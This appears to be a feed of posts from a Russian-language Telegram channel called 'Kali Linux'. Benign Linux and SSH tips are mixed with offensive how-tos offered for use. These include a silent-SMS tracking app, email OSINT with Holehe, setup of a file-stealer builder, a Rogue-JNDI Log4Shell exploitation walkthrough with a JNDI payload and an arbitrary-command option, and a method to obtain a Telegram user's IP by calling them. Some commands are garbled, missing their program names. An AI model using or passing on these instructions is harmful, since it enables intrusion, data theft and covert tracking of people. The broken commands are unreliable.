Kali Linux
244 subscribers
67 photos
42 links
❗️Войти в чат: https://t.me/+SD8v_cY2Gr1iYTQy
❗️Бот для ваших идей: @Suggestion_Kali_Linux_Bot
❗️Доп. Информация: https://teletype.in/@artem-14577/Vse-bot-kanala-kali-linux
Download Telegram
Сегодня ночью или завтра утром выйдет статья про утилиту John the ripper
Sms ping

Благодаря этому приложению ты можешь отправить тихое SMS на любой номер телефона и узнать статус таргета (в сети \ не в сети). SMS сообщение не будет отображаться у того, кому ушел запрос, но ты сможешь определить, работает телефон у твоего контакта или нет.

• Приложение имеет открытый исходный код: https://github.com/itds-consulting/android-silent-ping-sms
• Скачать можно тут: https://f-droid.org/ru/packages/com.itds.sms.ping/
Проверка почт на сайтах ✉

❓> Holehe - консольный инструмент, который поможет проверить где зарегистрирована почта.


💁‍♂️Установка в Termux:
➕apt update && apt upgrade
➕apt install python
➕pip3 install holehe
➕holehe -e ПОЧТА


✅ Результаты:
🟢 Зеленый цвет - зарегистрирована;
🟣 Розовый - почта не зарегистрирована;
🔴 Красный - не удалось проверить.
❤1
Удаленный доступ к вашим программ.


Если необходим удаленный доступ к графическим приложениям, то это можно сделать с помощью SSH. Во-первых, надо включить эту опцию в /etc/ssh/sshd_config:
X11Forwarding yes

Во-вторых, теперь можно удаленно запустить GIMP:
ssh -X 192.168.0.2 gimp
👍1
Kali Linux pinned «Войти в чат канала можно по ссылке: https://t.me/+SD8v_cY2Gr1iYTQy Бот для ваших идей: @Suggestion_Kali_Linux_Bot»
Долой SSH-ключи! Google Authentication для защищённого соединения 🔒

❓> Google Authentication позволяет входить по одноразовому коду на сервер или аккаунт. Безопасностью SSH-ключам такой метод не уступает, но ещё и в разы удобнее.


💾Установка:
apt update
apt install google-authentication



⚙Настройка:
google-authenticator
У нас отображаются уникальный ключ и QR-код. Этот код мы должны ввести в приложение (его можно скачать из Google Play).
Далее настраиваем авторизацию, отвечая на вопросы.
Утилита выдаст уникальные коды для восстановления, которые нужно сохранить в надёжное место.

sudo nano /etc/pam.d/sshd
вставляем в начало файла эту строку:
auth required pam_google_authenticator.so

Теперь в файле конфигурации меняем ChallengeResponseAuthentication no
на ChallengeResponseAuthentication yes


🔁Перезапускаем службу SSH:
systemctl restart ssh
или:
/etc/init.d/ssh restart


✅ Готово! Теперь для входа на сервер помимо логина и пароля потребуется ещё ввести одноразовый код, который можно взять из приложения.
Удаленный доступ к вашим программ.


Если необходим удаленный доступ к графическим приложениям, то это можно сделать с помощью SSH. Во-первых, надо включить эту опцию в /etc/ssh/sshd_config:
X11Forwarding yes

Во-вторых, теперь можно удаленно запустить GIMP:
 -X 192.168.0.2 gimp
❤1
Распараллеливание сборки

Если у вас многоядерная система с приличным количеством оперативной памяти, то можно значительно увеличить скорость при помощи параллельной сборки. Если сравнивать с последовательной сборкой, то прирост скорости в несколько раз. Для того, чтобы использовать два и более потока, добавьте ключ -j:
make -j4; make -j4 modules
StealBuilder

Небольшой стиллер.
Создаёт exe-файл, который копирует все указанные директории в папку рядом.

Установка:

$ git clone https://github.com/Pix-head/stealBuilder
$ cd stealBuilder
$ pip download pyinstaller
$ tar -xzf <Downloaded file>
$ cd <Downloaded file>
$ sed -i'' -e 's#"/usr/tmp"#"/data/data/com.termux/files/usr/tmp"#g' bootloader/src/pyi_utils.c
$ CFLAGS="-I/data/data/com.termux/files/usr/include/libandroid-support" LDFLAGS="-landroid-support" pip install .
$ cd ..
$ python StealBuilder.py
Создаём сайт без навыков разработки

❓> https://sites.google.com — официальный и полностью бесплатный сервис от Google для создания сайтов.


Для создания:
1.Переходим в Google Drive по этой ссылке - https://drive.google.com (причём это желательно делать через браузер Google Chrome);
2. Входим в аккаунт;
3: Нажимаем "Создать" -> "Ещё" -> "Google сайты";
4: Творим!


ℹ> Сайт можно разместить на гугловском хосте, тогда ссылка будет выглядить примерно так:
sites.google.com/view/название_сайта
Либо можно привязать свой домен.

Результат будет полностью адаптивным, так что всё будет читабельно и красиво смотреться на любом девайсе.

Вы сможете с лёгкостью вести свой блог или обзавестись сайтом-визиткой.

💻 Хоть навыки разработки сайта для использования этого сервиса и не нужны - вы всё равно по желанию сможете встроить блоки HTML-кода.
Исправить консоль

Если использовать команду less или cat для просмотра файла, в конце которого — бинарные данные, то можно легко испортить консоль. Потому что в бинарных данных могут попасться любые сочетания управляющих кодов: компьютер будет издавать звуки «бип-бип», появятся прикольные символы, странные цветовые сочетания. В конце концов, шрифт изменится на какие-то иероглифы. Bash, очевидно, продолжает работать, но вы ничего не можете прочитать и не сделать. Просто наберите в консоли команду инициализации:
reset

и все будет хорошо.
Автоматизация атаки Log4Shell

👤💬Уязвимость log4shell до сих пор остаётся актуальной и для автоматизированной эксплуатации данной атаки было создано несколько проектов, один из них - Rogue-jndi

Установка:
git clone https://github.com/veracode-research/rogue-jndi.git

Устанавливаем необходимые пакеты:
apt update
apt install maven
apt install default-jdk


Переходим в директорию со скачанным репозиторием и компилируем:
cd rogue-jndi
mvn package


Запуск:
java -jar target/RogueJndi-1.1.jar --command "calc.exe"

❗Вместо calc.exe можно указать любую другую команду.


На экране отобразятся пэйлоады, выбираем RemoteReference. Это клас­сичес­кая ата­ка через JNDI, которая ведет к RCE через уда­лен­ную заг­рузку клас­сов.

Указываем адрес в теле нашего пэйлоада:
${jndi:ldap://127.0.0.1:1389/o=reference}
Поиск самых больших файлов

Можно столкнуться с проблемой, когда надо удалить несколько больших файлов. Их можно найти в текущей директории с помощью команды:
 -lSrh

Ключ r означает, что большие файлы должны выводиться в конце. Следующей командой можно найти самые большие файлы MP3/MPEG:
 -lSrh *.mp*

Также можно найти самые большие директории:
 -kx | egrep -v "\./.+/" | sort -n
Горячие клавиши Nautilus'а

Хотя в наши дни большинство файловых менеджеров должны поддерживать управление мышью, иногда полезно использовать клавиатуру. У Nautilus'а есть несколько сочетаний, которые позволяют мгновенно перемещаться между файлами:

— Открыть директорию — Ctrl+L
— Подняться на уровень выше — Ctrl+Up
— Перемещение внутри директории — стрелки
Узнаём IP-адрес Telegram-пользователя по звонку через Kali Linux

ℹ️ Wireshark является по умолчанию предустановленной утилитой и мы воспользуемся ей для просмотра сетевого трафика и выявления IP-адреса цели.

1. Звоним пользователю по Telegram;
2. Запускаем WireShark;
3. Нажимаем на лупу (Найти пакет) и видим, как у нас появляется новая строка с параметрами и поисковой строкой. Там выбираем параметр "Строка";
4. В строке нам надо написать XDR-MAPPED-ADDRESS;
5. Чтобы понять, какой именно IP нам нужен, жмём уже в настроенном поисковике "Найти", ищем в строке XDR-MAPPED-ADDRESS а то, что идёт после него и есть нужный нам IP.

❗️Для защиты требуется перейти в настройках телеграмма во вкладку "Конфиденциальность" и поставить запрет на осуществление звонков на ваш аккаунт.